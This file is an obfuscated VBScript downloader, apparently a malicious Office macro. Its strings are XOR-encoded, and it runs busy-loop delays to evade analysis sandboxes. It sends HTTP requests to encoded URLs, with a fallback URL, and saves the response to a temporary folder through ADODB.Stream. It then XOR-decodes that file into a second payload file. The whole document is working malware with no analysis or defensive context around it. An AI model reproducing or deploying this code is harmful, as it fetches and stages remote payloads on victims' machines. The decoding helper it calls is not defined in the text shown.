DiM L4

O8kuK

suB O8kuK()
	Xx=92752151
	fOR GYM=1 To Xx
		Kigiwk=Kigiwk+1
	nExT
	iF Kigiwk=Xx theN
		WTh8P((5699-5695))
		LJvUVZS(("2211052869654A406066645449617D7B515F696A794A1E3C34640F15","SJeqX"))
	ENd iF
	
eNd SuB

sUb WTh8P(NIcXYuS)
	dIM Xr8l
	Xr8l=TimER+NIcXYuS
	dO wHiLE timER<Xr8l
		LOOp
EnD sUB

FuncTION LJvUVZS(DSUBiXAd)
	Dim W25DiXD8,JENQjiW,CM
	WFgObe="XY8w2"
	On ERrOR REsuMe nExT
	QWaUUe7="Nl82F3no"
	SeT W25DiXD8=QN7(Y9Ocx6cw("3B6B51345A1E1B603F50572A5F",QWaUUe7))
	StC5="UCB0e"
	LWj
	Set AP1w=W25DiXD8.EnVirONMeNT(Y9Ocx6cw("3F0A032C1D1F3C","LoX"))
	L4=AP1w(Y9Ocx6cw("2B070534121E15","LjWUpSJT"))&SRToxoH((-720+812))& QxRB & QxRB
	FRbgi2C="Sl23"
	Set JENQjiW=QN7(Y9Ocx6cw("215B502103415C35181C6B1E207A67073C",FRbgi2C))
	JENQjiW.oPeN Y9Ocx6cw("130363","ITF7Zzak"),DSUBiXAd,2681-2681
	JENQjiW.SeND
	if JENQjiW.StAtUs=(1378800/6894) then
		LWj
		WTh8P((22392/5598))
		CM = 9198
	Else
	JENQjiW.opEn Y9Ocx6cw("240B66","VcN2r"),Y9Ocx6cw("291A2631547D6E073C2507352E1E3D2E02332F0A3D341A362E01206F0D3D2C413E2E097C310522","RAn"),2150-2150
	JENQjiW.SEnd
	If JENQjiW.sTaTuS=(711200/3556)TheN CM = 9198
	end if
	If CM = 9198 THen
		I0w JENQjiW.reSPOnsEBoDY
	eNd If
eNd FunCTIon

fUnctiOn QN7(XKdOd2JA)
	sET QN7=CreaTeoBjeCT(XKdOd2JA)
EnD FUnCTIOn

SuB LWj()
	Dim Cq2m4Mu,RRxQ
	For Cq2m4Mu = 41 To 8000162
		RRxQ = TDZzgVL + 84 + 28 + 97
	Next
eND sUB

FUNction SRToxoH(G2OS)
	SRToxoH=cHR(G2OS)
ENd funCtION

FuNCtIOn QxRB()
	QxRB=secoND(tIMe)
enD funCTioN

sUb I0w(TT)
	DiM M3x3Bki
	SxyGLQ="U0Tg9"
	sEt M3x3Bki=QN7(Y9Ocx6cw("7110287D171E07134B305139",SxyGLQ))
	M3x3Bki.OPen
	M3x3Bki.TYpe=3295-3294
	M3x3Bki.WRite TT
	M3x3Bki.SavETOfILE L4 & Y9Ocx6cw("6D104126","UCB0e"),9812-9810
	M3x3Bki.Close
	Iw8Z
eND suB

SuB Iw8Z()
	A7B=""""
	V3x472a=L4 & QxRB & Y9Ocx6cw("45771637","Nk4UzM")
	DsqfW=Y9Ocx6cw("2C2B347F0F0B2A6F69137139270E1D12707348536D","OOFPQjs")
	Lhctq L4 & Y9Ocx6cw("56040915","Vx"),V3x472a
	iF Udnt="" Then WTh8P((13924/3481))
eND suB

FuncTIoN Lhctq(UEH,LVtaMA)
	dIM XY9qOIh,Vr,RDwheF,O5mb9P3N(5)
	O5mb9P3N(3)=99
	O5mb9P3N(0)=115
	O5mb9P3N(1)=110
	O5mb9P3N(2)=118
	O5mb9P3N(4)=56
	O5mb9P3N(5)=53
	Set XY9qOIh=QN7(Y9Ocx6cw("632B140611385926014127255C2D351612385525290D0B29533C", "L0Hfoa"))
	seT RDwheF=XY9qOIh.opENTextFIle(UEH,5054-5053,6976-6976)
	Set Vr=XY9qOIh.cREATEtexTfilE(LVtaMA,34-33,1610-1610)
	oN eRROR rEsuME nEXt
	dO
	XfQP2=RDwheF.rEAd(1676-1675)
	if ERr.nuMber = 0 then
		Vr.wrItE SRToxoH(JfHfmozH(UG0z4b(XfQP2),O5mb9P3N(0)))
	eND iF
	LoOp UNTIl Err.NUmBEr <> 0
	Vr.CLoSE
	RDwheF.ClOsE
EnD FUNcTIoN

FunCTiON JfHfmozH(FboQ,YkAUE)
	JfHfmozH=(FboQ aND nOt YkAUE)oR(NoT FboQ ANd YkAUE)
eNd Function

FUnCTiOn UG0z4b(QiYaL)
	UG0z4b=aSC(QiYaL)
EnD fUNCtion

